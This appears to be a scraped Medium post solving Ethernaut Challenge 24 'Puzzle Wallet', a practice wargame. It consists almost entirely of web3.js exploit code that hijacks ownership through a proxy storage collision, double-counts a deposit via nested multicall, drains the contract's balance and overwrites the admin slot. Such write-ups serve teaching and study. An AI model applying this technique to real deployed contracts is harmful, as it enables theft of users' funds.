Ethernaut Solutions: Challenge 24 Puzzle Wallet

// 1. Set ourselves as pendingAdmin so we can add to whitelistconst data1 = web3.eth.abi.encodeFunctionCall({
name: 'proposeNewAdmin',
type: 'function',
inputs: [
{
"name": "_newAdmin",
"type": "address"
}
],
}, [player])
await web3.eth.sendTransaction({
from:player,
to:contract.address,
data: data1
})
await contract.owner() == player // needs to be true // 2. Add ourselves to whitelist await contract.addToWhitelist(player) await contract.whitelisted(player) // confirm whitelisted // 3. Remove funds from contract to pass require in setMaxBalance
// We need to call multicall([data2, data3])
// data2 is deposit() data3 embeds deposit() in multicall
await web3.eth.getBalance(contract.address) // '1000000000000000'(await contract.balances(player)).toString() // '0'const amount1 = '1000000000000000' // amount in contract
const amount2 = (amount1 * 2).toString()
const data2 = web3.eth.abi.encodeFunctionCall({
name: 'deposit',
type: 'function',
inputs: [],
}, [])
const data3 = web3.eth.abi.encodeFunctionCall({
name: 'multicall',
type: 'function',
inputs: [
{
"name": "data",
"type": "bytes[]"
}
],
}, [[data2]])
await contract.multicall([data2, data3], { value: amount1})await web3.eth.getBalance(contract.address) // amount2(await contract.balances(player)).toString() // balance == oursawait contract.execute(player, amount2, '0x') await web3.eth.getBalance(contract.address) // '0' contract empty// 4. Call setMaxBalance() to set the owner storage slot to oursawait contract.setMaxBalance(player)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store